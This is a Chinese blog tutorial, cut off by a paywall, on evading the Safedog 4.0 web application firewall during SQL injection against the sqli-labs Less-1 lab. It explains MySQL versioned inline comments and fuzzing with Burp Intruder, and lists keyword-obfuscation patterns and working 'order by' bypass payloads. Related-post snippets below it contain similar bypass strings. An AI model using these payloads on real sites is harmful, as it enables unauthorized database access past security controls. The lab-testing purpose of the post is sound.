sql注入绕过安全狗4.0

已于 2022-02-07 21:57:21 修改
阅读量5.5k 收藏 19
点赞数
分类专栏: web漏洞小知识 文章标签: 安全 sql web安全
于 2022-02-07 21:53:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/122814962
版权
本文详细介绍了如何通过内联注释和特殊编码绕过安全狗4.0对SQL注入的防护,以sqli-labs的Less-1为例,展示了拦截order by、union select等关键字的绕过技巧,并提供了面向安全狗4.0的Python脚本和sqli-labs无安全狗全通关的payload。
摘要由CSDN通过智能技术生成

1.前言

该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。

2.前置知识

/*!*/叫做内联注释,当!后面所接的数据库版本号时,当实际的版本等于或是高于那个字符串,应用程序就会将注释内容解释为SQL,否则就会当做注释来处理。默认的,当没有接版本号时,是会执行里面的内容的

比如版本号为5.7.26,当/*!00000xxx*/-/*!50726xxx*/里的注释内容都可以解析为sql语句执行
而>/*!50726xxx*/里的注释内容就真的被注释,失去作用。

3.绕过关键字主要思路

在关键字处使用内联注释和%23%0a(注释换行),内联注释里的版本号即使低于实际版本号有的可以绕过,有的不能绕过(可能是安全狗做了一点小过滤)
所以我们可以使用burpsuite的intruder模块检测一下哪些版本号可以绕过,这里以sqli-labs(Less-1)为例,把版本号设置为payload点
在这里插入图片描述
设置payload类型为numbers
在这里插入图片描述
然后开始重放
在这里插入图片描述
在这里插入图片描述
看到两种响应长度,就可以暂停了,有一种一定是能绕过安全狗的版本号
在这里插入图片描述
然后下面进行绕过的时候就使用那个能绕过的版本号

3.1绕过连体关键字思路

X代表关键字

X/*/A*/%23%0aX
X/*/A*/X
X/*/--A----/*/X
X/*!66666A*/%23%0aX
X/*!44444X*/
X/*!44444%23%0aX*/
/*!44444X/*!44444X*/

3.2绕过单个关键字思路

X代表关键字

/*!%23%0aX*/
/*!X%23%0a*/
/*!44444X*/
X与前面参数连在一起(不用空格隔开,这个也是绕过方法)

4.以sqli-labs(Less-1)为例,绕过安全狗

4.1拦截order by

1' order/*!%23%0aby*/ 3 %23
1' order/*!*/%23%0aby 3 %23
1' order/*/*/by 3%23
1' order/*//------/*/
最低0.47元/天 解锁文章
活着Viva
关注
专栏目录
SQL注入绕过安全狗V4.0(Apache)及POC利用
weixin_43815032的博客
10-11 754
0x01 资源准备: python3.7:python-3.7.4-amd64.exe 安全狗安装包:safedogwzApache.exe (截至10月2号官网上下的apche v4.0最新版) phpStutdy集成环境:phpStudy_64.7z 需要...
安全狗mysql_Fuzz绕过安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 317
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
waf绕过安全狗4.0_payload
qq_36585338的博客
11-26 335
【代码】waf绕过安全狗4.0_payload。
sql注入黑名单绕过漏洞分析
最新发布
若有战,召必回
10-25 862
分析:该方法对参数进行非空判断,之后将我们的SQL_REGEX常量以|分割开来赋值给sqlKeywords数组,接着就是对数组依次遍历查看参数中是否存在数组中的相关字符串,若存在就会抛出异常。上面是我们的常量,我们发现对我们大部分的sql注入的敏感内容进行了限制,但是可以利用可根据MySQL的特性绕过,像使用/**/注释符我们可以利用这个来绕过滤。目前的最新版本是v4.7.9,我们发现在最新版本的黑名单中增加了like和*/,那么我们上面的poc就打不通了。
最新版安全狗(V4.0.2665) sql 注入绕过
qq_41891666的博客
12-01 2007
前言: 之前做测试的时候看见waf 就一脸懵逼,于是决定学一学waf bypass 的技术,这篇文章是关于bypass 安全狗来实现,看了网上的一些文章,然后自己搭了环境,动手实践一下,毕竟纸上得来终觉浅,绝知此事要躬行。 0x00 搭建安全狗环境 准备环境: 虚拟机 win 7 sp1 安全狗最新版本 V4.0.2665 phpstudy v8.1 坑: 安装安全狗的时候, 这个服务名怎么填都不对,网上的一些教程说把phpstudy 先修改为系统服务,但是问题是那是老版本的phpstudy ,现在使用的
SQL注入 安全狗apache4.0.26655绕过
crowsec
01-26 1906
微信公众号:乌鸦安全 扫取二维码获取更多信息! 说明 本次靶场采用经典的sqli-labs搭建,waf使用的是安全狗的apache4.0.26655版本,文章从最开始的分析到最后的结果,中间难免会有错误的地方,希望大家多多包涵和理解。 上次我们发了一篇SQL注入-安全狗超大数据包绕过的文章,使用的是安全狗apache3.5.12048版本,这次是4.0系列的版本,全手动注入,后续会带来这方面的视频课程和相关tamper的编写。 因为文章中的靶场搭载了公网上,所以对以前的笔记进行了打码。..
mysql联合注入绕过安全狗4.0
https://www.cnblogs.com/zpchcbd/
05-13 1896
环境 win2003 apache mysql php 操作 http://192.168.1.131/Less-1/index.php?id=1 数值型注入 首先判断是否存在注入点 这里使用的是科学记数法 简单粗暴 http://192.168.1.131/Less-1/index.php?id=1e0 不变 http://192.168.1.131/Less-1/index.php?id=1...
SQL注入之打狗棒法(安全狗绕过
快吃小蛋糕吧的博客
10-28 1351
最近在网上挖洞时,总会遇到烦人的安全狗,研究了一天发现绕过安全狗出奇的简单,只需要语法犀利即可。 前言: 相信在网络上做渗透测试时,总会遇到如下情况: 这是网站管理员在服务器上安装了安全狗安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能(结合安全狗安全中心使用)等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带.
SQL注入Bypass安全狗4.0.pdf
04-08
SQL注入攻击绕过安全狗4.0 SQL注入攻击是常见的Web应用安全漏洞之一,攻击者可以通过操纵SQL语句来访问或修改数据库中的数据。安全狗4.0是一款Web应用防火墙,可以检测和防止SQL注入攻击。但是,攻击者可以使用各种...
SQL注入 安全狗apache主程序版本v4.0.23137 绕过1
08-03
在这个特定的情况下,问题涉及的是安全狗apache主程序版本v4.0.23137的绕过策略。 描述中提到的“绕过1”意味着存在一个针对该版本的安全狗防护措施的规避方法,攻击者可以利用这个漏洞来执行未授权的SQL查询。以下...
绕过SQL注入安全狗4.0的实战挑战
3. **SQL注入绕过策略**: 文档的重点可能在于如何利用SQL注入技术来避开这种验证机制。例如,攻击者可能会尝试使用SQL注解,如`' OR 1=1; --`,将条件变成永远为真的表达式,使得空密码也能通过验证。另一种方法可能...
网站安全狗V4.0绕过姿势
干铮的博客
09-27 4031
网站安全狗下载地址: 网站安全狗-网站安全防护,防后门|防SQL注入|防CC攻击|网马查杀|防篡改https://www.safedog.cn/website_safedog.html DVWA下载: 链接:https://pan.baidu.com/s/1XZXC3r_LhtY9s7xJM_NAYQ 提取码:kun6 --来自百度网盘超级会员V3的分享 已DVWA SQL注入为例对网站安全狗进行绕过测试。 1.查看安全狗防御规则匹配库。 2.绕过分析 字符 ...
Safedog 4.0 bypass绕过
Keepb1ue的博客
02-28 3894
Safedog 4.0 bypass绕过
绕过安全狗进行sql注入(MySQL
热门推荐
一个安全研究员
07-31 1万+
过狗啦
SQL注入_Bypass安全狗apache主程序版本v4.0.23137绕过
crowsec
03-20 2713
更新时间:2021.10.21 微信公众号:乌鸦安全 说明 本文发在乌鸦安全知识星球,仅限内部使用! 1. 版本 当前版本是最新版安全狗 主程序版本号为:v4.0.23137 上一次的版本为 主程序版本号为:v4.0.26655 所以这次已经对安全狗进行了升级。 2. 开始绕 按照ling老板的笔记,继续: 关键:/*//------/*/ 安全狗 order by 绕过id=1%27%20order%20/*//------/*/--+%20%0Aby%203--+s 精简版:id=1%27%20
SQL注入-绕过安全狗
LJH1999ZN的博客
02-15 5118
绕过安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
sql注入绕过安全狗4.0版本
qq_18193739的博客
07-29 649
sql注入绕过安全狗4.0
实战sql注入绕过安全狗
weixin_45901902的博客
08-19 617
实战安全狗bypass 之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站 绕过 and 1=1 这种很显然直接被拦截,这里进行fuzz and 1 like 1 拦截 and /!1=1/ 不拦截 and hex(1) 不拦截 %23%0a 1=1 拦截 绕过order by 发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截 安全狗他拦截哪里我们就绕哪里 order%23%0aby 1 不拦截 order /!by/ 1拦截 .
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值